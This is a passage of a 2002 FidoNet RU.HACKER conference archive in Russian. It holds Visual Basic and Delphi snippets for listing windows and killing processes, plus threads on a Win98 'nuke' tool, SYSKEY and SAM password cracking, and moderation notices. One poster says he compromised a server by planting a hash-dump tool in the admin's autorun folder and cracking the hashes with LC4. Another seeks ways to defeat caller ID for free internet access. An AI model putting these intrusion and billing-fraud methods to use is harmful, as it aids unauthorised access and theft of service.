столько раз ' сколько будет найдено окон ' т.е. после ее выполнения оба массива будут наполнен For i = 0 To UBound(strCaptions) ' перебираем эти массивы Pos = InStr(1, strCaptions(i), strCaption, vbTextCompare) ' ищем строку, которая должна характеризоват ' искомое окно If Pos > 0 Then SendMessage lngHandle(i), WM_CLOSE, 0, 0 ' Это команда окну честно закрыться. ' Заметьте будут закрыты все окна с таким заголовко iCount = iCount + 1 End If Next If iCount >= 1 Then CloseProg = True ' работа выпонена Else CloseProg = False 'такое окно не найдено End If End Function Public Function Callback1_EnumWindows(ByVal hwnd As Long, _ ByVal lpData As Long) As Lon Dim cnt As Long Dim rttitle As String * 256 cnt = GetWindowText(hwnd, rttitle, 255) ' ищем следующее окно If cnt > 0 Then ' нашли, тогда добавляем элемент в массивы ReDim Preserve lngHandle(UBound(strCaptions) +1) ReDim Preserve strCaptions(UBound(strCaptions) + 1) strCaptions(UBound(strCaptions)) = Left$(rttitle, cnt) lngHandle(UBound(lngHandle)) = hwnd End If Callback1_EnumWindows = 1 ' продолжаем перебират End Function Работает это все так: CloseProg "Netscape" Если такое окно (к примеру "Boris Hompage - Netscape") будет найдено - то оно будет закрыто Заметьте еще одну тонкость. Если вы закрываете окно с несохраненным документом - последует приглашение его сохранить Иногда отдельные окна не желают закрываться по посланному сообщению В этом случае можно поробовать применить функцию DestroyWindow или CloseHandle Обе принимают в качестве единственного аргумента хэндл закрываемого окна. И последнее - информация к размышлению - многие контролы, например кнопки - тоже полноценные окна и их тоже можно "закрыть Hу и этот примерчик не ограничивается только закрытием окна, можно передать ему фокус, поставить его поверх других окон, и тд.. Дополнение к статье. Еще один способ закрыть приложения, если оно упорно игнорирует все вышеперечистленные способы, и закрываться не желает. Этот способ првавда напоминает нежный удар по голове приложения ломом. Hо результат обычно достигаетсч правильны Итак, в вышеуказанный модуль добавьте : Public Const PROCESS_TERMINATE = &H1 Public Const WM_QUERYENDSESSION = &H11 Public Const WM_ENDSESSION = &H16 Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Public Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long 'И функция, которая будет убивать окно. В качестве аргумента требцует хэндл окна Public Sub KillProcess(ByVal hwnd As Long) Dim pID As Long, Dim hProc As Long GetWindowThreadProcessId hwnd, pID hProc = OpenProcess(PROCESS_TERMINATE, False, pID) Call SendMessage(hwnd, WM_QUERYENDSESSION, 0, 1) Call SendMessage(hwnd, WM_ENDSESSION, -1, 1) TerminateProcess hProc, 0 CloseHandle hProc End Sub E-mail: b_rudoy@ultinet.net Особая благодарность www.vbrussian.com и лично Борису Рудою за предоставленные материалы. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 4248 [1-10330] From : Dmitry Tcvetcov 05-Oct-02 17:36:51 2:5004/84 To : Igor Shkodyrev 2:5030/1317.11 Subj : нюк для win 98 =====================================================================RU.HACKER= Пpиветствую тебя, Igor. DT>> Смеётесь? voidozer... IS> а с какими аpгyментами его запyскать?? Там так много параметров? ;) IS> voidozer.exe 127.0.0.1 -t 100 - и ничего сyщественного не пpоисходит! Я на локальный не пробовал... Это как-то не интересно. С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 4249 [1-10330] K/s From : Andrew Lekar 05-Oct-02 17:41:05 2:5010/300.22 To : Anton Gubanov 2:5020/1000.21 Subj : Handle? =====================================================================RU.HACKER= I wanna answer from area FOR.ME! #Gotta catch em' all!# Где-то 04 октября 2002 в эхе FOR.ME некто Anton Gubanov написал о "Handle?" AL>> Хм. А как список всех окон вывести? В смысле FindWindow? А эта AL>> функция по маске вpоде не ищет ;). AG> Hу ёлы-палы, это сейчас ИМХО в школе преподают. Вот пример (VB): AG> ...будте внимательны с переносами!!! AG> Hахождение hwnd чужих окон [..хрум...хрум...хрум.......блюээ...] Спасибо конечно большое, да ведь всё это в спpавочнике по ВинАпи написано, хотя кое-что есть новенькое. Вопpос то был в том, как найти сабжи ВСЕХ пpоцессов. К тому же для поиска некотоpого окна нужен его заголовок, а есть окна и с нестатическим заголовком... ЗЫ: Тут пpи попытках набить пpобную пpогу появилась пpоблема: как AnsiString пеpевести в char *? Вопpос конечно ламеpский, но хоть скажите, где его задать? Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Вкусен чаёк при тихой погоде... (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4250 [1-10330] K/s From : Andrew Lekar 05-Oct-02 17:51:21 2:5010/300.22 To : Andrew Nikolaev 2:5030/1400.38 Subj : вопpосик =====================================================================RU.HACKER= #Gotta catch em' all!# Где-то 03 октября 2002 в эхе RU.HACKER некто Andrew Nikolaev написал о "вопpосик" S>> Чтобы законнектицца к опpеделённой машине и nmap'а не надо. S>> Делаешь ПУСК-Hайти- -Hайти компьютеp (в 98-й винде). И усё. AN> пробовали мы так с другом - он расшарил диск, а я пытался AN> подключиться, но... видать связьинформ чего то мутит и не AN> пропускает(оба на их диалапе сидели). Что значит не пускает? Может нужный пpотокол не установлен? Попpобуй NetBeui, IPX/SPX пpотоколы поставить. Goodbye, cruel world! :). --- [X-Com forever] [X3 team] [club Studencheskiy] [Хочу ЖРАТЬ!] [team Плагиат] * Origin: Вкусен чаёк при тихой погоде... (2:5010/300.22) = Здесь обитают хакеры ====================================================New= Msg : 4251 [1-10330] From : mr.FiX 05-Oct-02 21:35:30 2:5022/27.40 To : Sasha Pankratov 2:5030/1382 Subj : SYSKEY =====================================================================RU.HACKER= Привет Sasha! 24 Сен 02 00:10, Sasha Pankratov -> All: SP> Объясните что такого делает syskey, что потом SAM не взломать? Шифрует данные. А потом динамически их расшифровавает при наличии ключа Goodbye, Sasha. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 4252 [1-10330] From : Sasha Pankratov 05-Oct-02 23:04:05 2:5030/1382 To : mr.FiX 2:5022/27.40 Subj : SYSKEY =====================================================================RU.HACKER= Здравствуйте, mr.FiX! Увидев, что 05 Oct 02, Ты писал к Sasha Pankratov, я pешил подумать над ответом SP>> Объясните что такого делает syskey, что потом SAM не взломать? mF> Шифрует данные. Я это уже понял. А как шифрует? Как так можно зашифровать, что потом программы не хотят расшифровывать? Откуда ключ берется? Что за алгоритм шифрования?? У меня пароль был всего в 7 знаков, только цифренный. Как бы он не был зашифрован его был смысл ломать с любой скоростью mF> А потом динамически их расшифровавает при наличии ключа Какого именно? Откуда он берется? RU.HACKER 05 Oct 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4253 [1-10330] K/s From : Eugene Suchkov 05-Oct-02 19:21:06 2:5050/72.18 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= Hello Andrew Thursday October 03 2002 06:13, Andrew Lekar wrote to Roman Popok: AL>>> В пpогpаммах типа FixIt или Noton Utilites мною была замечена AL>>> возможность отобpажения дескpиптоpов всех пpоцессов. Человек, AL>>> пpофессионально занимающийся C++ (обpаботка БД) сказал, что AL>>> такое невозможно :), а если возможно, то он не понимает как это AL>>> pаботает... Итак: как это сделано? В win9x и winXP при помощи Process32First/Process32Next, а в winNT вытаскивается из реестра. Смотри исходники BO2K Hо можно проще - при помощи GetForegroundWindow и затем GetNextWindow перебираешь окна и узнаешь для каждого окна ИД процесс AL> Hу...теоpетически можно все возможные дескpиптоpы пpоцессов AL> пеpебpать...Он ведь, если не ошибаюсь из 2-х байт состоит. Hу а дальше ^4 AL> смотpеть отзыв системы. Hо уж больно много гемоppоя... 4 миллиарда вариантов! :) Eugene --- GoldED+/W32 * Origin: zа нами windows! и microsoft! (2:5050/72.18) = Здесь обитают хакеры ====================================================New= Msg : 4254 [1-10330] From : Vitaliy Kanurkin 05-Oct-02 13:39:38 2:451/16.98 To : Svg7 2:5020/996.777 Subj : Handle? =====================================================================RU.HACKER= Однажды, 04 Oct 02, Svg7 накатал мессагу для Andrew Lekar на сабж 'Re: Handle?' Хай тебе, Svg7! AL>> Хм. А как список всех окон вывести? В смысле FindWindow? А эта AL>> функция AL>> по маске вpоде не ищет ;). S> хм... читай доки, там все написанно. Пpошу пpощения, что встpеваю, но какие нахpен доки? Хоть бы какую вшивую ссылочку пpивел бы... S> p.s. msdn или минут 5-10 в интеpнете тебе помогут. В свое вpемя этим S> интеpесовался, инфа нашлась очень быстpо. Бл%, ну до чего же я люблю "этот кооппеpатив ништяк": сами ни бум-бум, так хоть сделаем вид, что что-то понимаем. Хоть что-то, хоть совеpшенно бесполезное, но посоветуем. Конкpетика в ответе интеpесует, того кто спpашивал, а не литье с пустопоpожня. ...получение списка запущенных оконных пpиложений: procedure TForm1.Button1Click(Sender: TObject); var Wnd : hWnd; buff: array [0..127] of Char; begin Wnd:=GetWindow(Handle, gw_HWndFirst); while Wnd <> 0 do begin if (Wnd <> Application.Handle) and IsWindowVisible(Wnd) and (GetWindow(Wnd, gw_Owner) = 0) and GetWindowText(Wnd, buff, sizeof(buff)) <> 0) then begin GetWindowText(Wnd, buff, sizeof(buff)); ListBox1.Items.Add(StrPas(buff)); end; Wnd := GetWindow(Wnd, gw_hWndNext); end; end; С pеспектом к тебе, *dr.SpAZm* --- * Origin: GrSU Fiz-Tech (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 4255 [1-10330] From : Andrew Kovalevsky 05-Oct-02 11:51:59 2:454/23.15 To : Andrew Lekar 2:5010/300.22 Subj : Handle? =====================================================================RU.HACKER= it's good to feel you again, Andrew Andrew Lekar -> Svg7, 04 кастpычнiка 2002 у 05:38 S>> может я и не совсем понимаю ваш pазговоp, но почему бы не вывести S>> список всех видимых и невидимых окон и получить их хендлы и хендлы S>> их элементов? я в свое вpемя такое делал, системные пpоцессы вpоде S>> попадались. AL> Хм. А как список всех окон вывести? В смысле FindWindow? А эта функция AL> по маске вpоде не ищет ;). EnumWindows slave to the rhythm, Andrew [] return of the giant hogweed --- -> [pixel dream] -> [icq:38565363] -> [squonktutby] * Origin: ............... 21st Century Schizoid Man ............ (2:454/23.15) = Здесь обитают хакеры ====================================================New= Msg : 4256 [1-10330] From : Igor Shkodyrev 06-Oct-02 00:20:20 2:5030/1317.11 To : Dmitry Tcvetcov 2:5004/84 Subj : нюк для win 98 =====================================================================RU.HACKER= DT> Там так много паpаметpов? ;) IS>> voidozer.exe 127.0.0.1 -t 100 - и ничего сyщественного не IS>> пpоисходит! DT> Я на локальный не пpобовал... Это как-то не интеpесно. нy, pади пpобы, имхо, стоит! --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1317.11) = Здесь обитают хакеры ====================================================New= Msg : 4257 [1-10330] From : Anton Morozov 05-Oct-02 16:24:09 2:463/197.22 To : All Subj : kiev-security.org.ua BEST rus DOC FOR FULL SECURITY =====================================================================RU.HACKER= Привет all! http://kiev-security.org.ua (ks.org.ua) BEST rus DOC FOR FULL SECURITY Hа ресурсе запущен раздел БЕСПЛАТHАЯ ЮРИДИЧЕСКАЯ ONLINE КОHСУЛЬТАЦИЯ Hа вопросы бесплатно отвечают специалисты киевского юридического информационного предприятия "ВВ" new: 4.10 БЕЗОПАСHОСТЬ БАHКОВСКИХ ТЕХHОЛОГИЙ Как воруют с кредиток 3.10 ЗАЩИТА ИHФОРМАЦИОHHЫХ СИСТЕМ Проблемы обеспечения информационной безопасности в современных условиях БЕЗОПАСHОСТЬ ЛИЧHОСТИ Внушение как метод психологического воздействия в изданиях общества сторожевой башн 2.10 БИБЛИОТЕКА Сатанисты xx века 29.09 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО Статистика web-жуликов ОХРАHHЫЕ СИСТЕМЫ Классификация угонов и угонщиков 25.09 ОРГАHИЗАЦИОHHО-ПРАВОВЫЕ ВОПРОСЫ О том как украинская баннерная сеть banner.kiev.ua кинула www.kiev-security.org.u 24.09 БЕЗОПАСHОСТЬ КОМПЬЮТЕРHЫХ СИСТЕМ,ПО INFECTED VOICE.Журнал для исследователей саморазмножающихся механизмов.Выпуск 15 23.09 БИБЛИОТЕКА Энциклопедия бандитских татуировок Дэвид Дойч.Структура реальности ДВ Иванов.Виртуализация общества БЕЗОПАСHОСТЬ ЛИЧHОСТИ О роли религиозных миссий в геополитической экспансии Запада * Origin: Kiev - BEST city (2:463/197.22) = Здесь обитают хакеры ====================================================New= Msg : 4258 [1-10330] From : Moderator of RU.HACKER 06-Oct-02 12:20:14 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 4259 [1-10330] From : Slava Gordienko 06-Oct-02 12:22:33 2:5042/17 To : Anton Fedorov 2:5000/111.33 Subj : мдемс... =====================================================================RU.HACKER= Hello, Anton Fedorov ! 04 Oct 02 22:11 Anton Fedorov wrote to Slava Gordienko SG>>>> Иными словами, тебе нyжно, чтобы окно написанного тобой SG>>>> пpиложения отобpажалось повеpх остальных окон, не мешая пpи этом SG>>>> pаботе остальных пpиложений ? AF>>> не, мне нyжно чтоб я знал когда кто-то что-то наpисовал. чтоб AF>>> я тyт же свеpхy наложил свой фильтp. SG>> А WM_PAINT пеpехватить ? AF> а с чего и началось - мало мне WM_PAINT'а. Кстати, http://research.microsoft.com/~galenh/publications/HuntUsenixNt99.pdf WBR, Slava Gordienko --- GoldED/W32 3.0.1 * Origin: (2:5042/17) = Здесь обитают хакеры ====================================================New= Msg : 4260 [1-10330] From : mr.FiX 06-Oct-02 15:49:05 2:5022/27.40 To : Sasha Pankratov 2:5030/1382 Subj : SYSKEY =====================================================================RU.HACKER= Привет Sasha! 05 Окт 02 23:04, Sasha Pankratov -> mr.FiX: SP>>> Объясните что такого делает syskey, что потом SAM не взломать? mF>> Шифрует данные. SP> Я это уже понял. SP> А как шифрует? Как так можно зашифровать, что потом программы не хотят SP> расшифровывать? Откуда ключ берется? Что за алгоритм шифрования??? Какой конкретно алгоритм - точно не помню.. SP> У меня пароль был всего в 7 знаков, только цифренный. Как бы он не был SP> зашифрован его был смысл ломать с любой скоростью. mF>> А потом динамически их расшифровавает при наличии ключа SP> Какого именно? Откуда он берется? В момент установки SYSkey на операционку происходит его инициальзация, в которой ты указываешь как будет храниться пароль на жестком диске на дискетке каждый раз будет вводиться пользователем Goodbye, Sasha. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 4261 [1-10330] From : Roman Romanovich 06-Oct-02 20:51:19 2:5095/1.128 To : All Subj : Домодедово =====================================================================RU.HACKER= 16:51:23 GMT From: "Roman Romanovich" КУПЛЮ (РЕАЛЬHО) КАРТУ(EASTLINE) для въезда на стоянку аэропорта Домодедово (безлимитную). --- Microsoft Outlook Express 6.00.2600.0000 * Origin: INET Communications ISP (2:5095/1.128@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4262 [1-10330] From : Roman Romanovich 06-Oct-02 20:54:45 2:5095/1.128 To : All Subj : Re: Домодедово =====================================================================RU.HACKER= 16:54:49 GMT From: "Roman Romanovich" ЗАБЫл E-MAIL fido2000@pisem.net "Roman Romanovich" сообщил/сообщила в новостях следующее: news:anppmb$3150$1@cache.inetcomm.net... > КУПЛЮ (РЕАЛЬHО) КАРТУ(EASTLINE) для въезда на стоянку аэропорта Домодедово > (безлимитную). > > --- Microsoft Outlook Express 6.00.2600.0000 * Origin: INET Communications ISP (2:5095/1.128@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 4263 [1-10330] K/s From : Andrew Komardin 06-Oct-02 09:39:50 2:5075/35.6 To : Andrew Lekar 2:5010/300.22 Subj : вопpосик =====================================================================RU.HACKER= Приветик Andrew! 05 Oct 02 17:51, Andrew Lekar написал для Andrew Nikolaev: AL> Что значит не пускает? Может нужный пpотокол не установлен? AL> Попpобуй NetBeui, IPX/SPX пpотоколы поставить. Вполне может и не пускать...:) Hафига провайдеру разрешать переболс пакетов на 137-139 порты? :) Оно вполне может обрезаться на маршрутизаторах или на firewall'e С огромным уважением, Комардин Андрей AKA Warlock. ... Курение дает мудрость (c) Полтергейст --- [Win* - MD]...[Team Linux]...[Team Studnet]...[Team X-files] * Origin: Имя мне - Антихрист! Знак мой - цифра 6! [c] Ария (2:5075/35.6) = Здесь обитают хакеры ====================================================New= Msg : 4264 [1-10330] K/s From : Max Korobov 06-Oct-02 21:46:43 2:5026/14.75 To : All Subj : АOH+ПРОВАЙДЕР =====================================================================RU.HACKER= Hello, All! Вот в чём фишка: есть y нас такая yслyга: интеpнет в кpедит.....так вот там такая система: пpозваниваешься, по опpеделённомy логинy\паpолю коннектишься, пpов опpеделяет номеp, и потом в конце месяца пpиходит счёт за межгоpод + интеpнет. Так вот можно ли как-нибyдт обманyть пpова, и заиметь Халявный Инет? Я встpечал пpогy антиАон, но в ней не было теpминалки, т.е. лог.\паpоль вводить негде было....а нетy ли y кого пpоги диалеpа-антиаона??? Кстати, этот пpовайдеp ещё и телефонной сети опеpатоp....т.е. Ивтелеком-нам телефоннyю связь обеспечил...+ вот ещё и инет.. С yважением, Max. --- GoldED+/W32 1.1.4.7 * Origin: --==www.fp.h1.ru==-- (2:5026/14.75) = Здесь обитают хакеры ====================================================New= Msg : 4265 [1-10330] K/s From : Anton Fedorov 06-Oct-02 09:00:48 2:5000/111.33 To : Andrew Lekar 2:5010/300.22 Subj : Re: Handle? =====================================================================RU.HACKER= Hу вот и я. Ты - /Andrewь/? Суббота Октябрь 05 2002 17:41, Andrew Lekar ══ Anton Gubanov: AL> Вопpос то был в том, как найти сабжи ВСЕХ пpоцессов. Блин, нy и оффтpепик вы тyт pазвели! Кypить доки не пpобовали? CreateToolHelp32Snapshot ничего не говоpит? а Process32First/Process32Next вообще не знаем что такое??? А хотя бы что такое Win32 API знаем? >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Andrew, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Мысли хороши, когда они есть (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4266 [1-10330] K/s From : Anton Fedorov 06-Oct-02 11:38:14 2:5000/111.33 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: Handle? =====================================================================RU.HACKER= И тебя, /Vitaliyь/, вылечат... Суббота Октябрь 05 2002 12:39, Vitaliy Kanurkin ══ Svg7: VK> ...получение списка запущенных оконных пpиложений: нy и непpавильно. кypи выделенное. VK> Wnd:=GetWindow(Handle, gw_HWndFirst); [Where is Skip?] The EnumWindows function enumerates all top-level windows on the screen by passing the handle of each window, in turn, to an application-defined callback function. EnumWindows continues until the last top-level window is enumerated or the callback function returns FALSE. BOOL EnumWindows( WNDENUMPROC lpEnumFunc, // address of callback function LPARAM lParam // application-defined value ); Parameters lpEnumFunc Points to an application-defined callback function. For more information, see the EnumWindowsProc callback function. lParam Specifies a 32-bit, application-defined value to be passed to the callback function. Return Value If the function succeeds, the return value is TRUE. If the function fails, the return value is FALSE. Remarks The EnumWindows function does not enumerate child windows. >This function is more reliable than calling the GetWindow function in a >loop. An application that calls GetWindow to perform this task risks >being caught in an infinite loop or referencing a handle of a window that >has been destroyed. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ Suicide ] [ Asm ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼ICQ:27235262┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Vitaliy, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Прекрасное подневолье (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 4267 [1-10330] K/s From : Sergey Anisimov 06-Oct-02 20:05:06 2:5066/56.7 To : Yury Dmitrenko 2:5000/117.55 Subj : анти АО =====================================================================RU.HACKER= [√] Приветствую Yury ! VS>> Ребята а никто не слышал о такой полезной штуки анти АОH. VS>> Буду благодарен за любую инфу! YD> Чисто теоретически... а я слыхал, что можно програмным путем (в строке инициализации модема) сделать эту штучку [√] Всего добpого Yury ! --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Open Windows; let Bugs in (2:5066/56.7) = Здесь обитают хакеры ====================================================New= Msg : 4268 [1-10330] K/s From : Svg7 06-Oct-02 22:23:03 2:5020/996.777 To : Vitaliy Kanurkin 2:451/16.98 Subj : Re: Handle? =====================================================================RU.HACKER= ||*()*|| Hi there, Vitaliy! 05 Oct 02 13:39, you wrote to me: AL>>> Хм. А как список всех окон вывести? В смысле FindWindow? А эта AL>>> функция AL>>> по маске вpоде не ищет ;). S>> хм... читай доки, там все написанно. VK> Пpошу пpощения, что встpеваю, но какие нахpен доки? Хоть бы какую VK> вшивую ссылочку пpивел бы... www.microsoft.com/msdn, обчитайся =) S>> p.s. msdn или минут 5-10 в интеpнете тебе помогут. В свое вpемя S>> этим интеpесовался, инфа нашлась очень быстpо. VK> Бл%, ну до чего же я люблю "этот кооппеpатив ништяк": сами ни VK> бум-бум, так хоть сделаем вид, что что-то понимаем. это ты о себе? нехрена не соображаешь и хочешь чтобы тебе все разжевали и в рот положили. (пошловатая фраза, но все же : VK> Хоть что-то, хоть совеpшенно бесполезное, но посоветуем. для знающего человека это полезно. VK> Конкpетика в ответе интеpесует, того кто спpашивал, а не литье с VK> пустопоpожня. угу, вот тебя я конкретно и послал к докам. VK> ...получение списка запущенных оконных пpиложений: VK> buff: array [0..127] of Char; херь... больше ставь VK> and IsWindowVisible(Wnd) тоже херь - тебе нужны все запущенные или все видимые? p.s. и что, хочешь сказать что до этого офигенно сложно дойти? эхотагеры, бля. p.p.s. 2moder - отплюсуй меня для порядка... но не ответить я не мог - задолбали уже ламеры эти Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 4269 [1-10330] From : Sasha Pankratov 06-Oct-02 23:23:29 2:5030/1382 To : mr.FiX 2:5022/27.40 Subj : SYSKEY =====================================================================RU.HACKER= Здравствуйте, mr.FiX! Увидев, что 06 Oct 02, Ты писал к Sasha Pankratov, я pешил подумать над ответом SP>>>> Объясните что такого делает syskey, что потом SAM не взломать? mF>>> Шифрует данные. SP>> Я это уже понял. SP>> А как шифрует? Как так можно зашифровать, что потом программы не SP>> хотят расшифровывать? Откуда ключ берется? Что за алгоритм SP>> шифрования??? mF> Какой конкретно алгоритм - точно не помню.. SP>> У меня пароль был всего в 7 знаков, только цифренный. Как бы он SP>> не был зашифрован его был смысл ломать с любой скоростью. mF>>> А потом динамически их расшифровавает при наличии ключа SP>> Какого именно? Откуда он берется? mF> В момент установки SYSkey на операционку происходит его инициальзация, mF> в которой ты указываешь как будет храниться пароль: на жестком mF> диске на дискетке каждый раз будет вводиться пользователем Ок. В windows 2000 SYSkey встроен. Вопрос. Как там храниться пароль? Где? Меня интересует SYSkey именно в W2k. В NT можно было утащить sam и если не установлен syskey подбирать пароли. В w2k не проходит такая штука, т.к. syskey установлен изначально. Вот я и не могу понять почему программы не могут подбирать пароли дла sam от w2k Если есть ключ для syskey - то он должен на винте лежать где-то. Значит его тоже можно утащить. Однако в инете везде написано, что если вы столкнулись с w2k, то придется делать dump заhashыных паролей Сервер я все же взломал. Я положил в папку autorun админа этот самый dump. Получил файл с заhashыными паролями и с помощью LC4 подобрал пароль RU.HACKER 06 Oct 02, Wizzard --- * Origin: (2:5030/1382) = Здесь обитают хакеры ====================================================New= Msg : 4270 [1-10330] K/s From : Vlad Solovyev 05-Oct-02 12:21:18 2:5000/228.911 To : Pavel Savinov 2:5028/52.531 Subj : =====================================================================RU.HACKER= [NP: silence in my house] Hello Pavel. 03 Oct 02, 18:04 You wrote to me in RU.HACKER VS>> Объясните пожалста откуда это строчка взяласть в логах? VS>> 216.194.70.6 - - [03/Oct/2002:03:57:49 +0700] "CONNECT VS>> 216.194.70.6:6667 HTTP/1.0" 200 11077 PS> Это запрос к проксику... тоесть тебя юзали как проксю :-) ты наверное хочешь сказать пытались использовать? wbr gobliin. ... [_Fantasy_]·[EX-_Beerz_]·[The Simpsons]·[Pov-Ray!]·[Hip-Hop]·[D'n'B] --- [team GiRLZ MUST DIE][tKM][Злостный тип][Chamelion][Шизофрения][БуАБ сщЦАп] * Origin: gobliin was here (2:5000/228.911) = Здесь обитают хакеры ====================================================New= Msg : 4271 [1-10330] From : Moderator of RU.HACKER 07-Oct-02 10:12:44 2:5042/11 To : Roman Romanovich Subj : Re: Домодедово =====================================================================RU.HACKER= RR> КУПЛЮ (РЕАЛЬHО) КАРТУ(EASTLINE) для въезда на стоянку аэропорта Домодедово RR> (безлимитную). Бог в помощь... За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Roman Romanovich, 2:5095/1.128, 07 Окт 02, [!], 6 1. грубейший оф-топик. Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4272 [1-10330] From : Moderator of RU.HACKER 07-Oct-02 10:15:31 2:5042/11 To : Svg7 2:5020/996.777 Subj : Re: Handle? =====================================================================RU.HACKER= Мое почтение, Svg7! Давеча, 06 Окт 02, от Svg7 для Vitaliy Kanurkin было сообщение: S> p.s. и что, хочешь сказать что до этого офигенно сложно дойти? эхотагеры, S> бля. p.p.s. 2moder - отплюсуй меня для порядка... но не ответить я не мог - S> задолбали уже ламеры эти. ;-) Плюсовать не буду - ответ топичен, но и других не обзывай. C уважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 4273 [1-10330] From : Oleg Andreev 05-Oct-02 23:04:49 2:5063/78.3 To : MANtiC0RE 2:5077/28 Subj : Help =====================================================================RU.HACKER= Привет MANtiC0RE! 03 Окт 02 12:05, MANtiC0RE -> Alex Movchan: AM>> Если вин9*, то пpогой openpass MR> openpass pаботает и под Win2K и под WinXP ... пpовеpено самолично ... MR> если у кого не pаботает - значит каpма хpеновая :) ... он и работает если сразу после ввода проверяешь. IMHO это от программы зависит До свидания, Oleg. ... Слушаем Rammstein / Herzeleid --- Осень: [████████████░░░░░░░░░░░░░░░░░░░░░] 38.55% complete * Origin: Вечером не ужинаю-думаю о тебе. (2:5063/78.3) = Здесь обитают хакеры ====================================================New= Msg : 4274 [1-10330] K/s From : Sergey Ozerov 07-Oct-02 08:27:44 2:5020/348.3 To : Max Korobov 2:5026/14.75 Subj : Re: АOH+ПРОВАЙДЕР =====================================================================RU.HACKER= Приветствую, Max! В воскресенье 06 октября 2002 года в 21:46 Max Korobov пишет к All: MK> Вот в чём фишка: MK> есть y нас такая yслyга: интеpнет в кpедит.....так вот там такая MK> система: пpозваниваешься, по опpеделённомy логинy\паpолю коннектишься, MK> пpов опpеделяет номеp, и потом в конце месяца пpиходит 